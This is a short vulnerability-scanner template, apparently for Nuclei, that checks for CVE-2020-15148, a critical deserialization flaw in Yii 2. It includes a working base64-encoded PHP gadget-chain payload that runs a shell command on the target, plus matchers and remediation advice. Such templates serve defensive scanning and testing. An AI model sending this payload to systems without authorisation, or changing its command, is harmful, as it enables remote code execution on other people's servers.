id: CVE-2020-15148 info: name: Yii 2 < 2.0.38 - Remote Code Execution author: pikpikcu severity: critical description: Yii 2 (yiisoft/yii2) before version 2.0.38 is vulnerable to remote code execution if the application calls `unserialize()` on arbitrary user input. reference: - - - - remediation: Upgrade to version 2.0.38 or later. A possible workaround without upgrading is available in the linked advisory. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cve-id: CVE-2020-15148 cwe-id: CWE-502 tags: cve,cve2020,rce,yii requests: - method: GET path: - "{{BaseURL}}/index.php?r=test/sss&data=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6Njoic3lzdGVtIjtzOjI6ImlkIjtzOjY6ImxzIC1hbCI7fWk6MTtzOjM6InJ1biI7fX19fQ==" matchers-condition: and matchers: - type: word words: - "total" - "An internal server error occurred." condition: and - type: status status: - 500 # Enhanced by mp on 2022/04/27